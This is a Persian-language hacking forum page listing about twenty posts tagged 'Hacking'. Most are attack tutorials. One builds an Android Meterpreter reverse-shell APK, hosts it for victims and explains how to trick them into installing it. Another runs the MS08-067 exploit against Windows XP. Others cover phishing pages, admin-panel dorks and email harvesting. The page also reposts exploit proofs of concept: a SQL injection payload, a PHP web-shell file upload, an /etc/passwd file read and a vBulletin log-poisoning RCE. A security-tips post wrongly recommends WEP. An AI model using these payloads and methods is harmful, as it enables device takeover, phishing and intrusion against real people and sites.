امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

699 نتیجه پیدا شد

  1. Hacking

    سلام با استفاده از لینوکس کالی هک سایت میبنید امیدوارم خوشتون بیاد یا حق https://www.aparat.com/v/GpZFl پخش زنده دانلود فیلم sql map hacked site by rednofozi.mp4 - AnonFile
  2. سلام اموزش تصویری کار با ابزار فات رات کالی لینوکس برای هک آندروید پسورد فایل :anonysec.org rednofozi hacked rooting .rar - AnonFile
  3. Hacking

    Hijacking به نوعی از حمله در شبکه اتلاق می شود که مهاجم کنترل و ارتباط بین سیستم قربانی و شبکه را در دست می گیرد. Hijacking در اصل به معنی هواپیما ربایی است. هر نوع ربایش اطلاعات اعم از کلمه عبور ، اطلاعات ایمیل ، اطلاعات حساب بانکی و … را می توان Hijack نام برد. این نوع حملات در اشکال مختلف ممکن است انجام پذیرد. انواع Hijacking را می توان در لیست زیر بیان نمود : Session Hijacking DLL Hijacking Fake Page Putty Hijacking Cross Site Url Hijacking Ssh Session Hijacking Browser Hijacking MITM Hijacking در Session Hijacking از Session های کامپیوترهای معتبر برای دسترسی به اطلاعات و سرویس های سیستم استفاده می نمایند. به ویژه این نوع حمله از طریق ربودن کوکی ها ، اطلاعات احراز هویت کاربران را در اختیار مهاجم قرار می دهد. یک سیستم بعنوان کامپیوتر میانجی بین وب سرور و کاربر قرار می گیرد و با استفاده از ذخیره نمودن کوکی ها اقدام به ذخیره اطلاعات نموده و از آنها سوء استفاده می نمایند. روش بسیار معروف در Session Hijacking : source-routed IP packets می باشد. بعنوان نمونه در این روش، مهاجم تمام ترافیک اطلاعات بین دو کامپیوتر B C را از ماشین خود عبور میدهد. لذا تمام اطلاعات را براحتی می تواند شنود نماید. در روش دیگر مهاجم می تواند از Blind Hijacking استفاده نماید. مواقعی که به routing دسترسی نداشته باشد. در روش Blind مهاجم با حدس زدن جوابهایی که از سمت سرور می آید اقدام به ارسال دستور می نماید ، اما جوابی را مشاهده نمی نماید و فقط می تواند دستوری را ست نماید. بعنوان مثال دستور ست نمودن پسورد برای دسترسی به شبکه از مکان دیگر، می تواند یک نمونه از اینگونه دستورات باشد. در DLL Hijacking از ویژگی های ویندوز برای پیدا نمودن مسیر DLL جهت تخریب، مورد استفاده قرار می گیرد. اگر از DLL هایی که در یک برنامه مورد استفاده قرار می گیرد اطلاع داشته باشید ، می توانید آنرا با یک فایل دیگر در هاست مورد نظر تعویض نمایید و حملات خود را تحت نظر بگیرید. آدرس های مورد استفاده در ویندوز : a) . <--current working directory of the application, highest priority, first check b) windows c) windowssystem32 d) windowssyswow64 <-- lowest priority, last check Fake Page یک روش بسیار ساده برای گمراه نمودن کاربران سایتهای مشهور و یا پر بیننده می باشد. مهاجمان صفحاتی که مربوط به ورود اطلاعات حساب کاربری ، حساب بانکی ، فرستادن رمز عبور و … می باشد را مانند صفحه اصلی طراحی نموده و با استفاده از خطای ورود آدرس که گاهی اوقات توسط کاربران انجام می شود ( بعنوان مثال بجای آدرس اصلی bank-x.com از آدرس bankx.com استفاده می نمایند) صفحات خود را Upload نموده و اقدام به جمع آوری اطلاعات قربانیان می نمایند. در Putty Hijacking با ارسال یک DLL به پروسه Putty اقدام به Hijack نمودن اطلاعات Putty می نمایند. این قبیل حملات با استفاده از نرم افزارهایی مانند POC tool انجام می پذیرند. Cross Site Url Hijacking اغلب با استفاده از حفره های امنیتی مرورگرها اقدام به Hijacking می نمایند. این روش که به XSUH معروف است با استفاده از خطاهای firefox اقدام به ربودن url های سایتها می نماید. Browser Hijacking را می توان بعنوان یک ویروس یا بد افزار شناخت بطوریکه این فرم بجای صفحه پیشفرض مرورگر ، صفحه خطا و یا صفحه جستجو برای کاربر نمایان می شود و اقدام به ذخیره نمودن اطلاعات نموده و پس از اتصال به اینترنت اطلاعات را برای مهاجم ارسال می نماید. MITM Hijacking یا Man-in-the-middle به معنای مرد میانی به نوعی از حملات گفته می شود که یک واسط یا میانجی بین هر نوع ارتباط شبکه ای ، اجتماعی قرار می گیرد و اقدام به شنود اطلاعات نموده و اطلاعات را پس از پردازش و بهره برداری به مقصد می فرستد. موفق باشید
  4. باسلام همونطور که می دونید برای سیملینک زدن Symlink در سرور هکینگ Server Hacking و خوندن فایل کانفیگ Config File باید آدرس و مسیر فایل کانفیگ Cms های مختلف رو بدونید و من در این تاپیک سعی میخکنم انواع cms هارو به اشتراک بزارم موفق باشید
  5. با درودی دیگر خب حالا میخوایم با این سیستم به گوشی های هوشمند اندروید نفوذ کنیم اول یه اکسپلویت میسازیم با استفاده از ابزار msfpayload 1:درمحیط ترمینال مینویسیم msfpayload android/meterpreter/reverse_tcp LHOST=<attacker-ip-address> LPORT=<port-to-receive-connection> R > <name.apk> خب این فرمول،کاری نداره حالا جا گزاری میکنیم ای پی من 192.168.1.2 پورتی که میخوام کانکت شیم 81 اسم برنامه مثلا soroush.apk بعد میبیند که در home قرار داره تو عکس .جاگزاری فرمول تو عکس معلومه و بعد سرور apache2 را استارت میکنیم و فایل را قرار میدیم با دستور 1:service apache2 start اپاچی استارت میشه و بعد برای قرار دادن فایل در سرور برای دادن به قربانی از دستور زیر استفاده میکنیم 2:cp /root/soroush.apk /var/www/ جای سروش هر اسمی که برای برنامه در حین ساختن گزاشتید بزارید خب این تا اینجا ادامش در پست بعدی ... خب بریم سراغ بقیش من مطالبو ساده میگم همه بفهمن خیلی خودمونی خب حالا بعد انجام اون کارها دو راه داریم یا با محیط گرافیکی ارمتیج یا کد نویسی که دوتاشو میگم خب برای اجرای ارمتیج اول متااکسپلوییت رو فعال میکنیم سرورش رو برای این کار مراجعه میکنیم به applications>kali Linux>system services>metasploit>community / pro start میزنیم و ترمینال باز میشه صبر کنید تا همه چی استارت و ok بشه بعد بنویسید armitage صبر کنید تا یک صفحه بیاد به چیزیش دست نزنید لازم نداره رو گزینه connect کلیک کنید بعد yes صبر کنید تا پر بشه بعد یه محیط گرافیکی باز میشه اون بالا سمت چپ مثل عکس که شماره گزاری کردم بر روی payload کلیک کنید بعد روی android و بعد روی meterpreter و بعد روی reverse_tcp که یه صفحه باز میشه LHOST که همون ای پی هست ولی اگه نبود عوض کنید پورت رو‌عوض کنید تبدیل به پورتی کنید که تو اکسپولییت درست کردن نوشتید برای listen کردن و بعد روی Launch کلیک کنید دقت کنید پورت انتخاب شده باشه حالا هلو بپر تو گلو یادتونه برنامتون رو روی اپاچی گزاشتید خب حالا ایپیتون رو رو قبل از اسم برنامه با یه / بزارید مثلا مال من میشه 192.168.1.2/soroush.apk برای اینکه طرف به لینکتون شک نکنه میتونید لینک هاتونو کوتاه کنید مثلا برید تو این سایت شکل لینک عوض میشه و شک نمیکنن کوتاه کننده لینک یک و دو که لینکه مستقیمه بعد بعد از نصب برنامه توسط قربانی و وارد شدن با ان شما دسترسی میگیرین و باید با این پیغام مواجه بشید Meterpreter session 1 opened بقیشم نمینویسم بعد میتونید تا وبک و ....هک کنید دستور help رو بزنید تا کدها رو بیاره بعد من یه فیلم اپلود میکنم خیلی راحت همه چی گیراس که یکی از دوستان که هکره ایرانی نیست درست کردن چون من درست کردم دیدم زمانش دو برابر این شد البته من یزره بیشتر توضیح داده بودم و چون سرعت نتش بالاس در وقت کمتری ریکورد کرد من تا بیام بزنم وبکمش بیاد دو سه دقیقه طول میکشه ولی ایشون تا میزنه میاد 😕 البته دوستان انتی ویروس به شدت بهش گیر میده و نمیزاره اصلا شما باید از طریق مهندسی اجتماعی طرف رو گول بزنید بگید مثلا باید اف کنی تا این کار کنه و از این جور حرفا و روش دیگه اینه که کریپتش کنید مثلا انتی ویروس رو دور بزنید که برا این سو استفاده نشه از گزاشتن این اموزش معذورم‌و خیلی هم مبحث زیادیه و پیچیده و بخاطر این عکس که بد شد عذر میخوام دیگه حوصله نداشتم تمیز کار کنم اهان روش کد نویسی رو نگفتم البته من روش بالا رو پیشنهاد میکنم ولی خب شاید بعضی دوست داشته باشن اینطوری کار کنن وارد ترمینال میشیم 1: msfconsole رو تایپ کنید تا به محیط metasploit console بروید 2: use exploit/multi/handler 3: set payload android/meterpreter/reverse_tcp 4: set LHOST باز ایپی خودتون رو در اینجا بنوسید 5: set LPORT همون پورت برا متصل شدن اینجا بنوسید 6: exploit خب اگه درست رفته باشید با پیغام زیر مواجه میشید و از اون جایی که payload ما reverse_tcp است که در ان هکر منتظر اتصال قربانی به ماشین خود و.... [×] started reverse handler on ....... [×] starting the payload handler ... و بقیش مثل‌اون لینک‌رو میدیم با نصب و اجراش تمومه توجه مسیولیت اینکار بر عهده ی خودتونه برای فهمیدن ای پیتون دستور ifconfig Inet addr:ای پی شما این هم لینک فیلمی که گفتم مکمل این اموزش msfPayload_apk روش مقابه از زدن بر روی هر لینکی خود داری بکنید و هر برنامه ای را نصب‌نکنید و داشتن انتی ویروس اپدیت این ها روش معقول برا مقابله با این
  6. با عرض سلام به کاربران عزیز انونیسک در این اموزش قصت دارم برایتان اموزش هک سیستم های دارای ویندوز xp و ریموت دسکتاپ شدن به ان را برای شما یاد دهم . ابتدا ترمینال کالی لینوکس را باز کنید و در داخلش دستور msfconsole را تایپ کنید تا ابزار metasploit باز شود . بعد دستور زیر را تایپ کنید . use exploit/windows/smb/ms08_067_netapi خب با این دستور اکسپلوییت مورد نظر را انتخواب میکنیم . الان سراغ تنظیم rhost یا تارگت میکنیم . خب الان دستور show options را بنویسید . خب الان بنویسید set RHOST 1.1.1.1.1 به جا 1.1.1.1.1 ایپی تارگت را وارد کنید . خب الان باز show options را بنویسید تا ببینید که ایا تارگت تنظیم شده است یا نه . خب الان یک payload را انتخواب میکنیم تا وقتی نفوذ به سیستم شد برای ما با vnc اجرا نماید خب با دستور زیر payload را انتخواب میکنیم . set PAYLOAD windows/vncinject/bind_tcp خب payload انتخواب شد الان باز show options را تایپ کنید تا ببینید RHOST تغیر نکرده اگر کرده باز set RHOST TAGERT IP تنظیم کنید بعد دستور exploit را وارد کنید و صبر کنید تا به سرور یا سیستم تارگت متصل شود . خب اگر متصل شد شما میبینید که دسکتاپ ویندوز xp به شما باز میشود . امید وارم خوشتان امده باشد
  7. باسلام - در پی درخواست های مکرر کاربران درباره ساختن فیک پیج بنده این اموزش را تهیه کردم تا کاربران بدانند که چگونه باید فیک پیج را راه اندازی کنند جهت دانلود برروی لینک زیر کلیک کنید آموزش راه اندازی فیک پیج موفق باشید
  8. 1- روشن نبودن گزینه wps در مودم 2- استفاده نکردن از پسوردهای رند یا شماره موبایل 3- استفاده نکردن از پسورد های عددی و ساده 4- کاهش دادن امواج سیگنال TMP در اندازه منزل 5- استفاده از پروتکل WEP 6- عوض کردن پسوردها در زمان های کوتاه
  9. Hacking

    این مدل حمله ها روی خوده پروتکل های شبکه انجام میشه که همون DHCP باشه. اینو بخاطر این گفتم که فکر نکنید روی برنامه یا اپ خاصی که روی شبکه داره سرویس میده انجام میشه . البته میشه :)) مکانیزم این مدل حمله چیه؟؟ ابتدا هکر با مک آدرس های جعلی هزاران درخواست به سمت DHCP سرور ارسال میکنه که به اصطلاح میگن DHCP Starvation به زبان ساده DHCP سرور میریزه بهم و کلا میپاچه.. بعد هکر میاد DHCP سرور خودش رو جایگزین میکنه با قبلی.. چون کلا طی این فرایند رنج ipها از بین میره و سیستم خودش رو DHCP سرور میکنه و میتونه کلا DNS سرور و DefaultGateWay رو هم عوض کنه و روی این حمله یه DNS Spoofing رو هم انجام بده و دوباره شبکه رو به حالت اول برگردونه. ولی لاگ هاش میوفه و ادمین وقتی که متوجه بشه میتونه دوباره همه چیز رو برگردونه
  10. با سلام به کاربران عزیز anonysec میخوام یک اموزش خوب براتون قرار بدم اموزش جمع اوری ایمیل های یک سایت با کالی لینوکس ابتدا ترمینال را باز نمایید و دستور theharvester –d target.com -b all خب به جای taget.com ادرس سایتی که میخواهید ایمیل هایش را جمع کنید را بزنید و اطلاعات سایت را برای شما نمایش دهد امید وارم خوشتون امده باشه
  11. Hacking

    برنامه gnu root را از گوگل پلی دانلود کرده و اجرا کنید منتظر بمانید تا فایل های انتقال داده شود حدودا 15 دقیقه و یا 30 دقیقه منتظر بمانید تا تمام شود بعد عبارت زیر را در ترمینال gnu root debian تایپ کنید apt install update بعد عبارت apt install wifite را زده و ابزار را نصب کنید بعد با عبارت wifite کلا ابزار را اجرا کنید با تشکر
  12. Hacking

    با سلام در این اموزش میخوام اموزش پیدا کردن لینک پنل ادمین انواع سایت هارا برای شما بگذارم خب طبق نگاه به دروک های زیر inpage:admin site:example.com intitle:admin site:example.com inpage:login site:example.com intitle:login site:example.com intext:login site:example.com به جای example.com سایت یا تراگت خود را قرار دهید با تشکر
  13. Hacking

    خب بریم سراغ اموزش :)ّ 1- اول از گوگل پلی برنامه termux را دانلود کنید 2- حالا در قسمت ترمینال دستور هارا وارد کنید Pkg install nmap را تایپ کنید با تشکر Ãñóñÿ sec
  14. Hacking

    # # # # # # Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://jbuildozer.com/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ # Version: 1.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=[SQL] # # 1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # http://server/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # # # # #
  15. Hacking

    # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
  16. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  17. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  18. # SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 ## Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. ## Vulnerability details vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=. The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server. **Listing of /index.php:** ``` /* 48 */ $app = vB5_Frontend_Application::init('config.php'); /* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini /* 50 */ //file to catch these situations. /* 51 */ // We report all errors here because we have to make Application Notice free /* 52 */ error_reporting(E_ALL | E_STRICT); /* 53 */ /* 54 */ $config = vB5_Config::instance(); /* 55 */ if (!$config->report_all_php_errors) { /* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4 /* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); /* 58 */ } /* 59 */ /* 60 */ $routing = $app->getRouter(); /* 61 */ $method = $routing->getAction(); /* 62 */ $template = $routing->getTemplate(); /* 63 */ $class = $routing->getControllerClass(); /* 64 */ /* 65 */ if (!class_exists($class)) /* 66 */ { /* 67 */ // @todo - this needs a proper error message /* 68 */ die("Couldn't find controller file for $class"); /* 69 */ } /* 70 */ /* 71 */ vB5_Frontend_ExplainQueries::initialize(); /* 72 */ $c = new $class($template); /* 73 */ /* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments()); /* 75 */ /* 76 */ vB5_Frontend_ExplainQueries::finish(); ``` **Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:** ``` /* 15 */ public static function init($configFile) /* 16 */ { /* 17 */ parent::init($configFile); /* 18 */ /* 19 */ self::$instance = new vB5_Frontend_Application(); /* 20 */ self::$instance->router = new vB5_Frontend_Routing(); /* 21 */ self::$instance->router->setRoutes(); /* ... */ ``` We can see that setRoutes() is called: **Listing of /includes/vb5/frontend/routing.php:** ``` /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') /* 85 */ OR (strtolower(substr($path, -3)) == '.js') ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 91 */ /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* 243 */ /* 244 */ vB5_ApplicationAbstract::checkState(); /* 245 */ /* 246 */ throw new vB5_Exception_404("invalid_page_url"); /* 247 */ } ) ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* … */ ``` So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php: ``` /* 63 */ public function legacy($file) /* 64 */ { /* 65 */ $api = Api_InterfaceAbstract::instance(); /* 66 */ $api->relay($file); /* 67 */ } ``` If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php: ``` /* 117 */ public function relay($file) /* 118 */ { /* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file; /* 120 */ /* 121 */ if ($file AND file_exists($filePath)) /* 122 */ { /* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in /* 124 */ //index.php won't take place. If we better integrate the admincp into the /* 125 */ //frontend, we can (and should) remove this. /* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish')); /* 127 */ require_once($filePath); /* 128 */ } /* ... */ ``` As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php. ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg) If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename. ## Proof of Concept We can check if the server is vulnerable by sending the following GET request: ``` /index.php?routestring=.\\ ``` If the response is: ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png) The server is vulnerable. If we want to inject a php code to any file on the server we can use the access.log for example: ``` /?LogINJ_START=<?php phpinfo();?>LogINJ_END ``` After that we can include access.log with our PHP code: ``` /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log ``` ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
  19. Hacking

    # # # # # # Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ # Demo: http://www.smsemailmarketing.in/demo/videosharing/ # Version: 3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17649 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability implication allows an attacker to inject html code .... # # Proof of Concept: # # 1) # http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= # # # # # # #
  20. Hacking

